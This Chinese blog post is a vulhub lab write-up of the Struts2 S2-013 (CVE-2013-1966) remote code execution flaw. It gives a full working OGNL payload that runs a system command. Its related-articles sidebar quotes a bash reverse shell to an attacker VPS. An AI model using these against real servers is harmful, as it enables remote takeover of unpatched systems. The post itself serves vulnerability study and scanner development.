Struts2_013_RCE CVE-2013-1966 漏洞复现

最新推荐文章于 2024-05-08 14:39:11 发布
最新推荐文章于 2024-05-08 14:39:11 发布
阅读量1.6k 收藏 2
点赞数
分类专栏: vulhub_Writeup 文章标签: 安全漏洞 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/113636581
版权

Struts2_013_远程代码执行

by ADummy

0x00利用路线

​ 直接url执行payload,由于浏览器url输入框的长度有限,可以使用Hackbar插件,或burpsuite抓包测试。

0x01漏洞介绍

​ <s:a>includeParams=“all”>Click here.</s:a>,这个是struts2标签库的a标签,该标签会在页面上显示当前URL

Struts2标签库中的url标签和a标签的includeParams这个属性,代表显示请求访问参数的含义,一旦它的值被赋予ALL或者GET或者POST,就会显示具体请求参数内容。按照正常的需求,把参数urlEncode一下也就够了, 问题在于,struts把参数做了OGNL解析,导致OGNL表达式的执行。

​ 影响版本

	2.0.0 - 2.3.14.1

0x02漏洞复现

payload:

link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(‘id’).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(‘dbapp%3D’%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

​ 登录界面
在这里插入图片描述
Hackbar执行payload

在这里插入图片描述

Burpsuite抓包
在这里插入图片描述

0x03总结

​ 这是笔者的第二篇文章,由于我目前在华顺信安实习,写一些漏洞的POC和EXP,搜集一些可以利用的漏洞,补充到Goby扫描器中。今天刚好在师傅的带领下写了这个漏洞的POC,由于年代久远,及同样的框架完全可以由很多漏洞解决。但还是很具有学习意义。笔者较菜,暂时不能做代码分析。如果有需要,强烈推荐Devil师傅的文章。

0x04参考资料

https://www.cnblogs.com/devi1/p/13486629.html

所有的writeup,方便下载,留存。
https://github.com/ADummmy/vulhub_Writeup

ADummy_
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Struts2 includeParams属性远程命令执行漏洞(CVE-2013-1966)
weixin_30711917的博客
05-25 618
漏洞版本: Apache Group Struts 2.0.0 - 2.3.14 漏洞描述: CVE(CAN) ID: CVE-2013-1966 Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物。 Apache Struts2的s:a和s:url标签...
【Vulfocus解题复现Struts2 S2-013 Struts2 远程命令执行漏洞CVE-2013-1966
温氏效应
09-04 2638
漏洞介绍 名称:Struts2 S2-013 远程命令执行漏洞 漏洞版本:Apache Group Struts 2.0.0 - 2.3.14 CVE标识符:CVE-2013-1966 描述:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL中包含get参数,all-在URL中同时包含get和post参数。当INCLUDEPa
各种流量包特征
最新发布
san3144393495的博客
05-08 773
要执行的命令在exec里面,而且回显数据包里面有明显执行结果回显。
Struts2_013_ActionSupport
qq_33605778的博客
11-05 301
概述 com.opensymphony.xwork2.ActionSupport 类是默认的 Action 类. struts-default包位置: struts2-core.jar ==》 struts-default.xml ==》<package name="struts-default" abstract="true"> ActionSupport类: 1.在action节点中,如果不
struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution
weixin_34309435的博客
07-12 375
catalog 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix   1. Description OGNL provides, among other features, extensive expression evaluatio...
struts2 命令执行(CVE-2013-1965)
m0_74294234的博客
04-07 370
其中的"bash -i >%26 /dev/tcp/ip/port 0>%261"中的ip指的是vps的地址,port指的是你开启的监听端口。3:开启监听端口(我这里开启8888)并发送burpsuite中的重发器内容,若出现500状态码则是发送成功。小tips:如果你的监听一直失败:可能是你的监听没有打开,你需要在你的vps服务器上打开你的所有端口。输入指令:find / -name flag*即可得到flag。payload参考的是csdn的一位大佬的笔记。一:工具:burpsuite、vps服务器。
S2-013远程执行代码(CVE-2013-1966)
m0_65150886的博客
01-09 437
Struts2标签库中的url标签和a标签的includeParams这个属性,代表显示请求访问参数的含义,一旦它的值被赋予ALL或者GET或者POST,就会显示具体请求参数内容。按照正常的需求,把参数urlEncode一下也就够了, 问题在于,struts把参数做了OGNL解析,导致OGNL表达式的执行。​ <s:a>includeParams=“all”>Click here.</s:a>,这个是struts2标签库的a标签,该标签会在页面上显示当前URL。控制整个网站甚至控制服务器进一步内网渗透。
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCECVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
然而,就像任何其他复杂的软件系统一样,Struts2也存在安全漏洞。其中,S2-045 和 CVE-2017-5638 是一个极其严重的问题,可能导致远程代码执行(RCE),进而让攻击者完全控制受影响的服务器。 S2-045 漏洞,官方...
Jackson_RCE-CVE-2019-12384:CVE-2019-12384 漏洞测试环境
05-26
环境搭建 将项目导入到idea,再配置好maven之后设置自动导入依赖库,然后在本地的web空目录写入如下文件,保存为exec.sql。...CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd)...
f5_rce_poc:cve-2021-22986 f5 rce扩展批量检测poc
03-25
python3 f5_rce.py -u 指定目标URL -f 批量检测文件 -c 执行命令 效果如下所示: PS:输出不够美感,我会修改的 :beaming_face_with_smiling_eyes: 问题 该POC目前只能支持部分命令,执行history , ls等失败,原因...
Apache Struts ‘includeParams’安全绕过漏洞
weixin_30706691的博客
05-28 188
漏洞名称: Apache Struts ‘includeParams’安全绕过漏洞 CNNVD编号: CNNVD-201305-577 发布时间: 2013-05-28 更新时间: 2013-05-28 危害等级: 漏洞类型: 权限许可和访问控制 威胁类型: 远程 CVE编...
Struts2命令执行
Massimo__JAVA的博客
07-15 315
Struts2是一个基于MVC设计模式的JavaWeb应用框架,是在Struts和WebWork的技术的基础上进行合并的全新框架。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-013CVE-2013-1966
qq_51577576的博客
11-24 464
Struts2标签中和都包含一个includeParams属性,其值可设置为none、get 或 all,其对应意义分别为,none:链接不包含请求的任意参数值(默认),get:链接只包含GET请求中的参数和其值,all:链接包含GET和POST所有参数和其值.用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上.这个参数会进行OGNL表达式解析,从而可以插入任意OGNL表达式导致任意代码执行
[漏洞复现]Apache Struts2/S2-013CVE-2013-1966
k5664524的博客
01-17 525
2.3.1.2 之前的 Apache Struts 允许远程攻击者绕过 ParameterInterceptor 类中的安全保护并执行任意命令。
Struts2漏洞频出 祸根是Apache底层代码不严谨
荒岛码农
09-23 1162
http://www.ithome.com/html/it/83338.htm Struts2漏洞频出 祸根是Apache底层代码不严谨 2014-4-30 9:23:24来源:IT之家 原创作者:小智责编:小智 日前,Struts2再次爆出安全漏洞,主要影响国内电商、银行、运营商等诸多大型网站和为数众多的政府网站。国外安全研究人员日前发现,Apache Struts
2021-10-24
susun_cool的博客
10-24 531
复现Struts2 命令执行 (CVE-2013-1966漏洞 1、打开靶场,访问漏洞URL http://118.193.36.37:17771/ 2、点击该链接 3、利用Hackbar拼接payload Payload如下: ?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream
Weblogic RCE漏洞CVE-2020-14882&14883:复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882 和 CVE-2020-14883 被发现,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值